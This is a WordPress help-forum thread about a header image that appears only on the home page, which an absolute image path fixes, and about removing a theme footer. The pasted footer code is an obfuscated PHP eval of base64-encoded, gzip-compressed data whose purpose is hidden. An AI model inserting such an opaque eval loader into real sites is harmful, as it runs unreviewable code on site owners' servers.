• Hello, i’ve created a wordpress job site @ https://hnaruak.com/ and ive added a header image. but this image is showing only in Home Page and not in other pages.

    <div id="header">
    				<div class="logo"><img src="<?php bloginfo('template_url');?>/images/logo.png" /> </div>
    				<h1><a href="<?php echo get_option('home'); ?>/"><?php bloginfo('name'); ?></a><strong><img src="adsheader.jpg" align="right"></strong></h1>
    				<h2><?php bloginfo('description'); ?></h2>			
    			</div><!-- End Header -->

    Ive marked the line ive added to the template. And please, how do i get rid of the footer, when i try to change it, the whole template goes wrong. Please help.

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  • Thread Starter father.sphinx


    <img src="adsheader.jpg" align="right"> This is the line i’ve added in the header.php

    try and use the absolute filepath to the image, depending on your image location.

    <img src="<?php bloginfo('url'); ?>/adsheader.jpg" align="right">


    Thread Starter father.sphinx


    Thanks mate.. It worked. ??

    How about the footer??

    <?php eval(stripslashes(gzinflate(base64_decode("bVLBjpswED0nUv5hmstupQXureuo6nalPUQ9VG21EtLK4CFYMR7L9oL4+xpDItosB7DnPb95jN+Bb+LDpOqh1sL7L+W+1ihcueesiFW+2+62EyNtEk/JSOqEMllFIVB3pbIPWQbfjYRjBCHLLmcvEtfDDVHAqcWCbJjl38iOTp3aAOxgWwtYtwRSBLwv717Ku4+f4cAXqNJ0UqahiBjR4QLm8FVrSBIeHHp0PcocWGH53N7yzSN6dTIooRqBCWgdNtFOG4L9VBTDMORG1S2ecRzIyUCkfV5TV5R7CCponKw7RFgIkBgR5LdVVojoaP67ZwM1aS0qciIoMjCo0L7fvyYTRB20mJb527kQDoWnJhZeI9bjKEytzClvQ6dXttZYnOt6Ozl5uO3m3/rcYa8wmiGjlcHcYFhJ/vz1OyrF9ywg4r2+a3nAyquAviHnhcY4Ai0X8yu1ozgjHMngCD9St6h9U0tD223nK5tnl77/ZvCSsqeUomvOZtJ/nD9OWLsizQEa7OscwfuUnBkpKpJjWrNimi5nh78=")))); ?>

    Thread Starter father.sphinx



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